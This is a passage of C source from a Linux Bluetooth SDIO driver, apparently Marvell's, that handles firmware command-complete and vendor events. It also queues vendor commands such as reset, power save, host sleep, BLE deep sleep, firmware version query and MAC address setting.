 *  +--------+--------+--------+--------+
 *
 *  @param priv    A pointer to bt_private structure
 *  @param skb     A pointer to rx skb
 *  @return        BT_STATUS_SUCCESS (event consumed and freed) or
 *                 BT_STATUS_FAILURE (caller keeps ownership of skb)
 */
int
check_evtpkt(bt_private * priv, struct sk_buff *skb)
{
	struct hci_event_hdr *hdr = (struct hci_event_hdr *)skb->data;
	struct hci_ev_cmd_complete *ec;
	u16 opcode, ocf;
	int ret = BT_STATUS_SUCCESS;
	ENTER();
	/* Only consume events for commands this driver itself queued */
	if (!priv->bt_dev.sendcmdflag) {
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	if (hdr->evt == HCI_EV_CMD_COMPLETE) {
		ec = (struct hci_ev_cmd_complete *)
			(skb->data + HCI_EVENT_HDR_SIZE);
		opcode = __le16_to_cpu(ec->opcode);
		ocf = hci_opcode_ocf(opcode);
		PRINTM(CMD, "BT: CMD_COMPLTE ocf=0x%x, send_cmd_ocf=0x%x\n",
		       ocf, priv->bt_dev.send_cmd_ocf);
		/* Response must match the command currently in flight */
		if (ocf != priv->bt_dev.send_cmd_ocf) {
			ret = BT_STATUS_FAILURE;
			goto exit;
		}
		switch (ocf) {
		case BT_CMD_MODULE_CFG_REQ:
		case BT_CMD_BLE_DEEP_SLEEP:
		case BT_CMD_CONFIG_MAC_ADDR:
		case BT_CMD_CSU_WRITE_REG:
		case BT_CMD_LOAD_CONFIG_DATA:
		case BT_CMD_LOAD_CONFIG_DATA_EXT:
		case BT_CMD_AUTO_SLEEP_MODE:
		case BT_CMD_HOST_SLEEP_CONFIG:
		case BT_CMD_SDIO_PULL_CFG_REQ:
		case BT_CMD_RESET:
			/* Transaction finished: wake the waiting sender */
			priv->bt_dev.sendcmdflag = FALSE;
			priv->adapter->cmd_complete = TRUE;
			wake_up_interruptible(&priv->adapter->cmd_wait_q);
			break;
		case BT_CMD_GET_FW_VERSION: {
			/* Version bytes follow the cmd-complete header */
			u8 *pos = (skb->data + HCI_EVENT_HDR_SIZE +
				   sizeof(struct hci_ev_cmd_complete) + 1);
			snprintf(fw_version, sizeof(fw_version),
				 "%u.%u.%u.p%u",
				 pos[2], pos[1], pos[0], pos[3]);
			priv->bt_dev.sendcmdflag = FALSE;
			priv->adapter->cmd_complete = TRUE;
			wake_up_interruptible(&priv->adapter->
					      cmd_wait_q);
			break;
		}
#ifdef SDIO_SUSPEND_RESUME
		case FM_CMD: {
			u8 *pos = (skb->data + HCI_EVENT_HDR_SIZE +
				   sizeof(struct hci_ev_cmd_complete) + 1);
			/* Only the SET_INTR_MASK sub-command completes a
			 * driver-issued FM transaction */
			if (*pos == FM_SET_INTR_MASK) {
				priv->bt_dev.sendcmdflag = FALSE;
				priv->adapter->cmd_complete = TRUE;
				wake_up_interruptible(&priv->adapter->
						      cmd_wait_q);
			}
		}
			break;
#endif
		case BT_CMD_HOST_SLEEP_ENABLE:
			/* Completion is signalled later by the HS event in
			 * bt_process_event(), not here */
			priv->bt_dev.sendcmdflag = FALSE;
			break;
		default:
			ret = BT_STATUS_FAILURE;
			break;
		}
	}
exit:
	/* Consumed events are freed here; rejected ones stay with caller */
	if (ret == BT_STATUS_SUCCESS)
		kfree_skb(skb);
	LEAVE();
	return ret;
}

/**
 *  @brief This function process the received event
 *
 *  Event format:
 *  +--------+--------+--------+
 *  | EC     | Length | Data   |
 *  +--------+--------+--------+
 *  | 1-byte | 1-byte | n-byte |
 *  +--------+--------+--------+
 *
 *  @param priv    A pointer to bt_private structure
 *  @param skb     A pointer to rx skb
 *  @return        BT_STATUS_SUCCESS (event consumed and freed) or
 *                 BT_STATUS_FAILURE (caller keeps ownership of skb)
 */
int
bt_process_event(bt_private * priv, struct sk_buff *skb)
{
	int ret = BT_STATUS_SUCCESS;
	struct m_dev *m_dev = &(priv->bt_dev.m_dev[BT_SEQ]);
	BT_EVENT *pevent;
	ENTER();
	pevent = (BT_EVENT *) skb->data;
	/* 0xff is the Marvell vendor-specific event code */
	if (pevent->EC != 0xff) {
		PRINTM(CMD, "BT: Not Marvell Event=0x%x\n", pevent->EC);
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	switch (pevent->data[0]) {
	case BT_CMD_AUTO_SLEEP_MODE:
		/* data[1]=requested mode, data[2]=status */
		if (pevent->data[2] == BT_STATUS_SUCCESS) {
			if (pevent->data[1] == BT_PS_ENABLE)
				priv->adapter->psmode = 1;
			else
				priv->adapter->psmode = 0;
			PRINTM(CMD, "BT: PS Mode %s:%s\n", m_dev->name,
			       (priv->adapter->psmode) ?
"Enable" : "Disable"); } else { PRINTM(CMD, "BT: PS Mode Command Fail %s\n", m_dev->name); } break; case BT_CMD_HOST_SLEEP_CONFIG: if (pevent->data[3] == BT_STATUS_SUCCESS) { PRINTM(CMD, "BT: %s: gpio=0x%x, gap=0x%x\n", m_dev->name, pevent->data[1], pevent->data[2]); } else { PRINTM(CMD, "BT: %s: HSCFG Command Fail\n", m_dev->name); } break; case BT_CMD_HOST_SLEEP_ENABLE: if (pevent->data[1] == BT_STATUS_SUCCESS) { priv->adapter->hs_state = HS_ACTIVATED; if (priv->adapter->suspend_fail == FALSE) { #ifdef SDIO_SUSPEND_RESUME #ifdef MMC_PM_KEEP_POWER #ifdef MMC_PM_FUNC_SUSPENDED bt_is_suspended(priv); #endif #endif #endif wake_up_interruptible(&priv->adapter-> cmd_wait_q); } if (priv->adapter->psmode) priv->adapter->ps_state = PS_SLEEP; PRINTM(CMD, "BT: EVENT %s: HS ACTIVATED!\n", m_dev->name); } else { PRINTM(CMD, "BT: %s: HS Enable Fail\n", m_dev->name); } break; case BT_CMD_MODULE_CFG_REQ: if ((priv->bt_dev.sendcmdflag == TRUE) && ((pevent->data[1] == MODULE_BRINGUP_REQ) || (pevent->data[1] == MODULE_SHUTDOWN_REQ))) { if (pevent->data[1] == MODULE_BRINGUP_REQ) { PRINTM(CMD, "BT: EVENT %s:%s\n", m_dev->name, (pevent->data[2] && (pevent->data[2] != MODULE_CFG_RESP_ALREADY_UP)) ? "Bring up Fail" : "Bring up success"); priv->bt_dev.devType = pevent->data[3]; PRINTM(CMD, "devType:%s\n", (pevent->data[3] == DEV_TYPE_AMP) ? "AMP controller" : "BR/EDR controller"); priv->bt_dev.devFeature = pevent->data[4]; PRINTM(CMD, "devFeature: %s, %s, %s, %s, %s\n", ((pevent-> data[4] & DEV_FEATURE_BT) ? "BT Feature" : "No BT Feature"), ((pevent-> data[4] & DEV_FEATURE_BTAMP) ? "BTAMP Feature" : "No BTAMP Feature"), ((pevent-> data[4] & DEV_FEATURE_BLE) ? "BLE Feature" : "No BLE Feature"), ((pevent-> data[4] & DEV_FEATURE_FM) ? "FM Feature" : "No FM Feature"), ((pevent-> data[4] & DEV_FEATURE_NFC) ? "NFC Feature" : "No NFC Feature")); } if (pevent->data[1] == MODULE_SHUTDOWN_REQ) { PRINTM(CMD, "BT: EVENT %s:%s\n", m_dev->name, (pevent->data[2]) ? 
"Shut down Fail" : "Shut down success"); } if (pevent->data[2]) { priv->bt_dev.sendcmdflag = FALSE; priv->adapter->cmd_complete = TRUE; wake_up_interruptible(&priv->adapter-> cmd_wait_q); } } else { PRINTM(CMD, "BT_CMD_MODULE_CFG_REQ resp for APP\n"); ret = BT_STATUS_FAILURE; } break; case BT_EVENT_POWER_STATE: if (pevent->data[1] == BT_PS_SLEEP) priv->adapter->ps_state = PS_SLEEP; PRINTM(CMD, "BT: EVENT %s:%s\n", m_dev->name, (priv->adapter->ps_state) ? "PS_SLEEP" : "PS_AWAKE"); break; case BT_CMD_SDIO_PULL_CFG_REQ: if (pevent->data[pevent->length - 1] == BT_STATUS_SUCCESS) PRINTM(CMD, "BT: %s: SDIO pull configuration success\n", m_dev->name); else { PRINTM(CMD, "BT: %s: SDIO pull configuration fail\n", m_dev->name); } break; default: PRINTM(CMD, "BT: Unknown Event=%d %s\n", pevent->data[0], m_dev->name); ret = BT_STATUS_FAILURE; break; } exit: if (ret == BT_STATUS_SUCCESS) kfree_skb(skb); LEAVE(); return ret; } /** * @brief This function shows debug info for timeout of command sending. 
 *
 *  @param adapter  A pointer to bt_adapter
 *  @param cmd      Timeout command id
 *
 *  @return         N/A
 */
static void
bt_cmd_timeout_func(bt_adapter * adapter, u16 cmd)
{
	ENTER();
	adapter->num_cmd_timeout++;
	/* Dump driver/adapter state to aid post-mortem of the timeout */
	PRINTM(ERROR, "Version = %s\n", adapter->drv_ver);
	PRINTM(ERROR, "Timeout Command id = 0x%x\n", cmd);
	PRINTM(ERROR, "Number of command timeout = %d\n",
	       adapter->num_cmd_timeout);
	PRINTM(ERROR, "Interrupt counter = %d\n", adapter->IntCounter);
	PRINTM(ERROR, "Power Save mode = %d\n", adapter->psmode);
	PRINTM(ERROR, "Power Save state = %d\n", adapter->ps_state);
	PRINTM(ERROR, "Host Sleep state = %d\n", adapter->hs_state);
	PRINTM(ERROR, "hs skip count = %d\n", adapter->hs_skip);
	PRINTM(ERROR, "suspend_fail flag = %d\n", adapter->suspend_fail);
	PRINTM(ERROR, "suspended flag = %d\n", adapter->is_suspended);
	PRINTM(ERROR, "Number of wakeup tries = %d\n", adapter->WakeupTries);
	PRINTM(ERROR, "Host Cmd complet state = %d\n", adapter->cmd_complete);
	PRINTM(ERROR, "Last irq recv = %d\n", adapter->irq_recv);
	PRINTM(ERROR, "Last irq processed = %d\n", adapter->irq_done);
	PRINTM(ERROR, "sdio int status = %d\n", adapter->sd_ireg);
	PRINTM(ERROR, "tx pending = %d\n", adapter->skb_pending);
	LEAVE();
}

/**
 *  @brief This function send reset cmd to firmware
 *
 *  @param priv    A pointer to bt_private structure
 *
 *  @return        BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
bt_send_reset_command(bt_private * priv)
{
	struct sk_buff *skb = NULL;
	int ret = BT_STATUS_SUCCESS;
	BT_HCI_CMD *pcmd;
	ENTER();
	skb = bt_skb_alloc(sizeof(BT_HCI_CMD), GFP_ATOMIC);
	if (skb == NULL) {
		PRINTM(WARN, "No free skb\n");
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	pcmd = (BT_HCI_CMD *) skb->data;
	/* HCI Reset: RESET_OGF group, zero-length payload */
	pcmd->ocf_ogf = (RESET_OGF << 10) | BT_CMD_RESET;
	pcmd->length = 0x00;
	pcmd->cmd_type = 0x00;
	bt_cb(skb)->pkt_type = HCI_COMMAND_PKT;
	/* 3 = 2-byte opcode + 1-byte length header */
	skb_put(skb, 3);
	skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ]));
	/* NOTE(review): commands are queued at the head of tx_queue (LIFO);
	 * appears intentional so driver commands go out first — confirm */
	skb_queue_head(&priv->adapter->tx_queue, skb);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = BT_CMD_RESET;
	priv->adapter->cmd_complete = FALSE;
	PRINTM(CMD, "Queue Reset Command(0x%x)\n", pcmd->ocf_ogf);
	/* Kick the main thread to drain tx_queue, then wait for the
	 * command-complete event (or time out) */
	wake_up_interruptible(&priv->MainThread.waitQ);
	if (!os_wait_interruptible_timeout
	    (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete,
	     WAIT_UNTIL_CMD_RESP)) {
		ret = BT_STATUS_FAILURE;
		PRINTM(MSG, "BT: Reset timeout:\n");
		bt_cmd_timeout_func(priv->adapter, BT_CMD_RESET);
	} else {
		PRINTM(CMD, "BT: Reset Command done\n");
	}
exit:
	LEAVE();
	return ret;
}

/**
 *  @brief This function sends module cfg cmd to firmware
 *
 *  Command format:
 *  +---------+--------+--------+
 *  | OCF OGF | Length | Data   |
 *  +---------+--------+--------+
 *  | 2-byte  | 1-byte | 4-byte |
 *  +---------+--------+--------+
 *
 *  @param priv    A pointer to bt_private structure
 *  @param subcmd  sub command
 *  @return        BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
bt_send_module_cfg_cmd(bt_private * priv, int subcmd)
{
	struct sk_buff *skb = NULL;
	int ret = BT_STATUS_SUCCESS;
	BT_CMD *pcmd;
	ENTER();
	skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC);
	if (skb == NULL) {
		PRINTM(WARN, "BT: No free skb\n");
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	pcmd = (BT_CMD *) skb->data;
	pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_MODULE_CFG_REQ;
	pcmd->length = 1;
	pcmd->data[0] = subcmd;
	bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT;
	skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length);
	skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ]));
	skb_queue_head(&priv->adapter->tx_queue, skb);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = BT_CMD_MODULE_CFG_REQ;
	priv->adapter->cmd_complete = FALSE;
	PRINTM(CMD, "Queue module cfg Command(0x%x)\n", pcmd->ocf_ogf);
	wake_up_interruptible(&priv->MainThread.waitQ);
	/* On some Android platforms certain delay is needed for HCI daemon to
	   remove this module and close itself gracefully. Otherwise it hangs.
	   This 10ms delay is a workaround for such platforms as the root
	   cause has not been found yet.
	 */
	/* NOTE(review): mdelay() busy-waits; msleep() may be preferable if
	 * this path is always sleepable — confirm before changing */
	mdelay(10);
	if (!os_wait_interruptible_timeout
	    (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete,
	     WAIT_UNTIL_CMD_RESP)) {
		ret = BT_STATUS_FAILURE;
		PRINTM(MSG, "BT: module_cfg_cmd (0x%x): "
		       "timeout sendcmdflag=%d\n",
		       subcmd, priv->bt_dev.sendcmdflag);
		bt_cmd_timeout_func(priv->adapter, BT_CMD_MODULE_CFG_REQ);
	} else {
		PRINTM(CMD, "BT: module cfg Command done\n");
	}
exit:
	LEAVE();
	return ret;
}

/**
 *  @brief This function enables power save mode
 *
 *  @param priv    A pointer to bt_private structure
 *  @return        BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
bt_enable_ps(bt_private * priv)
{
	struct sk_buff *skb = NULL;
	int ret = BT_STATUS_SUCCESS;
	BT_CMD *pcmd;
	ENTER();
	skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC);
	if (skb == NULL) {
		PRINTM(WARN, "No free skb\n");
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	pcmd = (BT_CMD *) skb->data;
	pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_AUTO_SLEEP_MODE;
	if (priv->bt_dev.psmode)
		pcmd->data[0] = BT_PS_ENABLE;
	else
		pcmd->data[0] = BT_PS_DISABLE;
	if (priv->bt_dev.idle_timeout) {
		/* Optional 16-bit idle timeout, little-endian in data[1..2] */
		pcmd->length = 3;
		pcmd->data[1] = (u8) (priv->bt_dev.idle_timeout & 0x00ff);
		pcmd->data[2] = (priv->bt_dev.idle_timeout & 0xff00) >> 8;
	} else {
		pcmd->length = 1;
	}
	bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT;
	skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length);
	skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ]));
	skb_queue_head(&priv->adapter->tx_queue, skb);
	PRINTM(CMD, "Queue PSMODE Command(0x%x):%d\n", pcmd->ocf_ogf,
	       pcmd->data[0]);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = BT_CMD_AUTO_SLEEP_MODE;
	priv->adapter->cmd_complete = FALSE;
	wake_up_interruptible(&priv->MainThread.waitQ);
	if (!os_wait_interruptible_timeout
	    (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete,
	     WAIT_UNTIL_CMD_RESP)) {
		ret = BT_STATUS_FAILURE;
		PRINTM(MSG, "BT: psmode timeout:\n");
		bt_cmd_timeout_func(priv->adapter, BT_CMD_AUTO_SLEEP_MODE);
	}
exit:
	LEAVE();
	return ret;
}

/**
 *  @brief This function sends hscfg command
 *
 *  @param priv    A pointer to bt_private structure
 *
@return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_send_hscfg_cmd(bt_private * priv) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_HOST_SLEEP_CONFIG; pcmd->length = 2; pcmd->data[0] = (priv->bt_dev.gpio_gap & 0xff00) >> 8; pcmd->data[1] = (u8) (priv->bt_dev.gpio_gap & 0x00ff); bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); PRINTM(CMD, "Queue HSCFG Command(0x%x),gpio=0x%x,gap=0x%x\n", pcmd->ocf_ogf, pcmd->data[0], pcmd->data[1]); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_HOST_SLEEP_CONFIG; priv->adapter->cmd_complete = FALSE; wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(MSG, "BT: HSCFG timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_HOST_SLEEP_CONFIG); } exit: LEAVE(); return ret; } /** * @brief This function sends sdio pull ctrl command * * @param priv A pointer to bt_private structure * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_send_sdio_pull_ctrl_cmd(bt_private * priv) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_SDIO_PULL_CFG_REQ; pcmd->length = 4; pcmd->data[0] = (priv->bt_dev.sdio_pull_cfg & 0x000000ff); pcmd->data[1] = (priv->bt_dev.sdio_pull_cfg & 0x0000ff00) >> 8; pcmd->data[2] = (priv->bt_dev.sdio_pull_cfg & 0x00ff0000) >> 16; 
pcmd->data[3] = (priv->bt_dev.sdio_pull_cfg & 0xff000000) >> 24;
	bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT;
	skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length);
	skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ]));
	skb_queue_head(&priv->adapter->tx_queue, skb);
	/* data[1]:data[0] = pull-up halfword, data[3]:data[2] = pull-down */
	PRINTM(CMD,
	       "Queue SDIO PULL CFG Command(0x%x), PullUp=0x%x%x,PullDown=0x%x%x\n",
	       pcmd->ocf_ogf, pcmd->data[1], pcmd->data[0], pcmd->data[3],
	       pcmd->data[2]);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = BT_CMD_SDIO_PULL_CFG_REQ;
	priv->adapter->cmd_complete = FALSE;
	wake_up_interruptible(&priv->MainThread.waitQ);
	if (!os_wait_interruptible_timeout
	    (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete,
	     WAIT_UNTIL_CMD_RESP)) {
		ret = BT_STATUS_FAILURE;
		PRINTM(MSG, "BT: SDIO PULL CFG timeout:\n");
		bt_cmd_timeout_func(priv->adapter, BT_CMD_SDIO_PULL_CFG_REQ);
	}
exit:
	LEAVE();
	return ret;
}

#ifdef SDIO_SUSPEND_RESUME
/**
 *  @brief This function set FM interrupt mask
 *
 *  @param priv     A pointer to bt_private structure
 *  @param mask     FM interrupt mask value
 *
 *  @return         BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
fm_set_intr_mask(bt_private * priv, u32 mask)
{
	struct sk_buff *skb = NULL;
	int ret = BT_STATUS_SUCCESS;
	BT_CMD *pcmd;
	ENTER();
	skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC);
	if (skb == NULL) {
		PRINTM(WARN, "No free skb\n");
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	pcmd = (BT_CMD *) skb->data;
	pcmd->ocf_ogf = (VENDOR_OGF << 10) | FM_CMD;
	pcmd->length = 0x05;
	pcmd->data[0] = FM_SET_INTR_MASK;
	/* mask copied verbatim (host byte order) into the payload */
	memcpy(&pcmd->data[1], &mask, sizeof(mask));
	PRINTM(CMD, "FM set intr mask=0x%x\n", mask);
	/* Note: FM commands go out as HCI_COMMAND_PKT on the FM m_dev,
	 * unlike the MRVL_VENDOR_PKT BT commands above. */
	bt_cb(skb)->pkt_type = HCI_COMMAND_PKT;
	skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length);
	skb->dev = (void *)(&(priv->bt_dev.m_dev[FM_SEQ]));
	skb_queue_head(&priv->adapter->tx_queue, skb);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = FM_CMD;
	priv->adapter->cmd_complete = FALSE;
	wake_up_interruptible(&priv->MainThread.waitQ);
	if (!os_wait_interruptible_timeout(priv->adapter->cmd_wait_q,
					   priv->adapter->cmd_complete,
					   WAIT_UNTIL_CMD_RESP)) {
		ret = BT_STATUS_FAILURE;
		PRINTM(MSG, "FM: set intr mask=%d timeout\n", (int)mask);
		bt_cmd_timeout_func(priv->adapter, FM_CMD);
	}
exit:
	LEAVE();
	return ret;
}
#endif

/**
 *  @brief This function enables host sleep
 *
 *  Unlike the other command senders this waits on hs_state (changed by
 *  the event handler) rather than cmd_complete, then decides whether the
 *  suspend attempt succeeded.
 *
 *  @param priv     A pointer to bt_private structure
 *  @return         BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
bt_enable_hs(bt_private * priv)
{
	struct sk_buff *skb = NULL;
	int ret = BT_STATUS_SUCCESS;
	BT_CMD *pcmd;
	ENTER();
	skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC);
	if (skb == NULL) {
		PRINTM(WARN, "No free skb\n");
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	priv->adapter->suspend_fail = FALSE;
	pcmd = (BT_CMD *) skb->data;
	pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_HOST_SLEEP_ENABLE;
	pcmd->length = 0;	/* no payload */
	bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT;
	skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length);
	skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ]));
	skb_queue_head(&priv->adapter->tx_queue, skb);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = BT_CMD_HOST_SLEEP_ENABLE;
	PRINTM(CMD, "Queue hs enable Command(0x%x)\n", pcmd->ocf_ogf);
	wake_up_interruptible(&priv->MainThread.waitQ);
	if (!os_wait_interruptible_timeout
	    (priv->adapter->cmd_wait_q, priv->adapter->hs_state,
	     WAIT_UNTIL_HS_STATE_CHANGED)) {
		PRINTM(MSG, "BT: Enable host sleep timeout:\n");
		bt_cmd_timeout_func(priv->adapter, BT_CMD_HOST_SLEEP_ENABLE);
	}
	/* Evaluate hs_state/is_suspended atomically w.r.t. the ISR. */
	OS_INT_DISABLE;
	if ((priv->adapter->hs_state == HS_ACTIVATED) ||
	    (priv->adapter->is_suspended == TRUE)) {
		OS_INT_RESTORE;
		PRINTM(MSG, "BT: suspend success! skip=%d\n",
		       priv->adapter->hs_skip);
	} else {
		priv->adapter->suspend_fail = TRUE;
		OS_INT_RESTORE;
		priv->adapter->hs_skip++;
		ret = BT_STATUS_FAILURE;
		PRINTM(MSG, "BT: suspend skipped! "
		       "state=%d skip=%d ps_state= %d WakeupTries=%d\n",
		       priv->adapter->hs_state, priv->adapter->hs_skip,
		       priv->adapter->ps_state, priv->adapter->WakeupTries);
	}
exit:
	LEAVE();
	return ret;
}

/**
 *  @brief This function sets ble deepsleep mode
 *
 *  @param priv     A pointer to bt_private structure
 *  @param mode     TRUE/FALSE
 *
 *  @return         BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
bt_set_ble_deepsleep(bt_private * priv, int mode)
{
	struct sk_buff *skb = NULL;
	int ret = BT_STATUS_SUCCESS;
	BT_BLE_CMD *pcmd;
	ENTER();
	skb = bt_skb_alloc(sizeof(BT_BLE_CMD), GFP_ATOMIC);
	if (skb == NULL) {
		PRINTM(WARN, "No free skb\n");
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	pcmd = (BT_BLE_CMD *) skb->data;
	pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_BLE_DEEP_SLEEP;
	pcmd->length = 1;
	pcmd->deepsleep = mode;
	bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT;
	skb_put(skb, sizeof(BT_BLE_CMD));
	skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ]));
	skb_queue_head(&priv->adapter->tx_queue, skb);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = BT_CMD_BLE_DEEP_SLEEP;
	priv->adapter->cmd_complete = FALSE;
	PRINTM(CMD, "BT: Set BLE deepsleep = %d (0x%x)\n", mode,
	       pcmd->ocf_ogf);
	wake_up_interruptible(&priv->MainThread.waitQ);
	if (!os_wait_interruptible_timeout
	    (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete,
	     WAIT_UNTIL_CMD_RESP)) {
		ret = BT_STATUS_FAILURE;
		PRINTM(MSG, "BT: Set BLE deepsleep timeout:\n");
		bt_cmd_timeout_func(priv->adapter, BT_CMD_BLE_DEEP_SLEEP);
	}
exit:
	LEAVE();
	return ret;
}

/**
 *  @brief This function gets FW version
 *
 *  @param priv     A pointer to bt_private structure
 *
 *  @return         BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
bt_get_fw_version(bt_private * priv)
{
	struct sk_buff *skb = NULL;
	int ret = BT_STATUS_SUCCESS;
	BT_HCI_CMD *pcmd;
	ENTER();
	skb = bt_skb_alloc(sizeof(BT_HCI_CMD), GFP_ATOMIC);
	if (skb == NULL) {
		PRINTM(WARN, "No free skb\n");
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	pcmd = (BT_HCI_CMD *) skb->data;
	pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_GET_FW_VERSION;
	pcmd->length =
0x01;
	pcmd->cmd_type = 0x00;
	bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT;
	skb_put(skb, 4);	/* ocf_ogf(2) + length(1) + cmd_type(1) */
	skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ]));
	skb_queue_head(&priv->adapter->tx_queue, skb);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = BT_CMD_GET_FW_VERSION;
	priv->adapter->cmd_complete = FALSE;
	wake_up_interruptible(&priv->MainThread.waitQ);
	if (!os_wait_interruptible_timeout(priv->adapter->cmd_wait_q,
					   priv->adapter->cmd_complete,
					   WAIT_UNTIL_CMD_RESP)) {
		ret = BT_STATUS_FAILURE;
		PRINTM(MSG, "BT: Get FW version: timeout:\n");
		bt_cmd_timeout_func(priv->adapter, BT_CMD_GET_FW_VERSION);
	}
exit:
	LEAVE();
	return ret;
}

/**
 *  @brief This function sets mac address
 *
 *  @param priv     A pointer to bt_private structure
 *  @param mac      A pointer to mac address (6 bytes)
 *
 *  @return         BT_STATUS_SUCCESS or BT_STATUS_FAILURE
 */
int
bt_set_mac_address(bt_private * priv, u8 * mac)
{
	struct sk_buff *skb = NULL;
	int ret = BT_STATUS_SUCCESS;
	BT_HCI_CMD *pcmd;
	int i = 0;
	ENTER();
	skb = bt_skb_alloc(sizeof(BT_HCI_CMD), GFP_ATOMIC);
	if (skb == NULL) {
		PRINTM(WARN, "No free skb\n");
		ret = BT_STATUS_FAILURE;
		goto exit;
	}
	pcmd = (BT_HCI_CMD *) skb->data;
	pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_CONFIG_MAC_ADDR;
	pcmd->length = 8;
	pcmd->cmd_type = MRVL_VENDOR_PKT;
	pcmd->cmd_len = 6;
	/* Firmware expects the address byte-reversed. */
	for (i = 0; i < 6; i++)
		pcmd->data[i] = mac[5 - i];
	bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT;
	skb_put(skb, sizeof(BT_HCI_CMD));
	skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ]));
	skb_queue_head(&priv->adapter->tx_queue, skb);
	priv->bt_dev.sendcmdflag = TRUE;
	priv->bt_dev.send_cmd_ocf = BT_CMD_CONFIG_MAC_ADDR;
	priv->adapter->cmd_complete = FALSE;
	PRINTM(CMD, "BT: Set mac addr " MACSTR " (0x%x)\n", MAC2STR(mac),
	       pcmd->ocf_ogf);
	wake_up_interruptible(&priv->MainThread.waitQ);
	if (!os_wait_interruptible_timeout
	    (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete,
	     WAIT_UNTIL_CMD_RESP)) {
		ret = BT_STATUS_FAILURE;
		PRINTM(MSG, "BT: Set mac addr: timeout:\n");
		bt_cmd_timeout_func(priv->adapter, BT_CMD_CONFIG_MAC_ADDR);
	}
exit:
	LEAVE();
	return ret;
}

/**
 *  @brief This function load the calibrate data
 *
 *  @param priv         A pointer to bt_private structure
